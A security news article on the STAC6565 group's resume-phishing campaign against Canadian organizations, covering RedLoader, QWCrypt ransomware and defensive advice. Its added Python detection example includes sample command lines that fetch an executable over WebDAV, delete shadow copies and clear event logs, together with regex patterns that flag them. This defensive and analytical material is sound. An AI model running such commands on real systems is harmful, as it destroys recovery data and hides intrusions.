STAC6565 Targets Canada: A Growing Cyber Threat
STAC6565 targets Canada in most of its recent attacks. Researchers say the campaign shows a sharp rise in focused cyber operations. Moreover, investigators observed almost 40 incidents between early 2024 and mid-2025.
The group overlaps with an older cluster known as Gold Blade, but the report notes that this actor now mixes espionage with ransomware. The activity also stretches across multiple countries, although Canada remains the main target.
Shift From Espionage to Ransomware
The group originally relied on phishing to steal business data. However, recent waves show a shift toward ransomware. The attackers now deploy a custom strain called QWCrypt.
They use a tool known as RedLoader to gather system data. It also contacts remote servers and launches scripts to explore internal directories. Therefore, intrusions often escalate quickly.
A Narrow but Intense Geographic Focus
Almost 80% of recent attacks targeted Canadian organizations. Other victims include entities in the U.S., the U.K., and Australia. By sector, the report highlights that service and manufacturing organizations suffered the most.
The group appears to follow a “hack-for-hire” model. It carries out tailored intrusions for paying clients. Therefore, its campaigns often include both data theft and selective ransomware deployment.
Sophisticated Tactics and Long Rest Cycles
Researchers describe STAC6565 as highly professional: it refines its tools frequently and uses quiet extortion tactics. The report states, however, that it is not linked to any government.
The attackers work in cycles. They pause activity for long periods, then strike with updated tools. Therefore, defenders must anticipate sudden spikes in attacks.
Phishing Through Job Platforms
The attack chain usually begins with spear-phishing. The group sends fake resumes to HR teams. Since late 2024, it has also uploaded malicious documents to popular job platforms.
This method increases the chance that a recipient opens the weaponized file. It also bypasses basic email filtering. Therefore, HR staff face elevated risks.
Delivery Chains and Multi-Stage Payloads
A notable attack used a fake resume that redirected victims to a harmful link. The link triggered a RedLoader chain that delivered QWCrypt. Researchers observed several variations of this chain in 2024 and 2025.
One update involved a ZIP archive containing a disguised shortcut file. The shortcut fetched a disguised executable through a WebDAV server. Then RedLoader loaded additional payloads in several stages. Each stage gathered system details and sent data to attacker-controlled servers.
Defense Evasion and System Control
The group also uses advanced evasion tools. One technique abuses a vulnerable driver to disable antivirus services. Furthermore, in some cases, the attackers distributed modified components across servers before launching ransomware.
In successful cases, QWCrypt ran after days of quiet observation. The final script disabled recovery options and wiped logs. Therefore, victims faced major challenges in restoring systems.
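Two points in the chain described above leave traces in process-creation telemetry: the shell-launched fetch from a WebDAV path (the shortcut stage) and the later tampering with recovery options and logs. The following detection logic is an added example, not code from the report or its authors; the sample events are constructed, and the specific commands it looks for (vssadmin, wevtutil) are an assumption, since the report does not name them.

```python
import re

# Constructed sample process-creation events (parent image, image, command line).
# Illustrative records written for this example, not telemetry from the report.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": r"cmd.exe /c \\203.0.113.10@SSL\DavWWWRoot\resume\update.exe"},
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": r"cmd.exe /c \\fileserver\share\tool.exe"},  # plain SMB, not WebDAV
    {"parent": "explorer.exe", "image": "winword.exe",
     "cmdline": r"WINWORD.EXE C:\Users\hr\Downloads\resume.docx"},
    {"parent": "cmd.exe", "image": "vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"parent": "cmd.exe", "image": "wevtutil.exe",
     "cmdline": "wevtutil.exe cl Security"},
]

# Windows WebDAV redirector paths carry an @SSL/@port suffix on the host or a
# DavWWWRoot component; plain \\host\share paths are SMB and are not flagged.
WEBDAV_HINT = re.compile(r"\\\\[^\\\s]+@(?:ssl|\d+)\b|\\DavWWWRoot\\", re.I)

# Commands commonly used to disable recovery and clear logs before encryption.
# The report only says recovery was disabled and logs wiped; the exact commands
# below are an assumption of this example.
RECOVERY_TAMPER = [
    re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"\bwevtutil(?:\.exe)?\s+cl\b", re.I),
]


def classify(event):
    """Return alert tags for one process-creation event (empty list if benign)."""
    tags = []
    cmd = event["cmdline"]
    # Stage 1: a process started from the desktop shell (how a double-clicked
    # shortcut launches) that reaches out to a WebDAV share for its payload.
    if event["parent"].lower() == "explorer.exe" and WEBDAV_HINT.search(cmd):
        tags.append("webdav-fetch-from-shell")
    # Stage 2: recovery options disabled or event logs cleared.
    if any(p.search(cmd) for p in RECOVERY_TAMPER):
        tags.append("recovery-or-log-tampering")
    return tags


def scan(events):
    """Return (index, tags) for every event that raised at least one alert."""
    tagged = [(i, classify(e)) for i, e in enumerate(events)]
    return [(i, t) for i, t in tagged if t]
```

Run against real telemetry, the WebDAV match on its own is a medium-confidence signal; the two stages firing on the same host within days is the pattern the report describes.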
Rising Threats Against Hypervisors
Researchers warn that ransomware groups now target hypervisors more often. Attackers deploy payloads directly on these systems to bypass endpoint defenses. As a result, organizations face greater risk across entire virtual environments.
Experts recommend strict access controls and multi-factor authentication. They also advise isolating management networks and auditing administrator actions regularly.
How to Prevent These Attacks
Organizations should train HR staff to detect suspicious documents and avoid opening unknown attachments. They must also monitor servers, user accounts, and external traffic for unusual activity. Additionally, companies can strengthen defenses by adopting continuous threat-monitoring services and automated incident-response systems that detect lateral movement early and block malicious scripts across endpoints.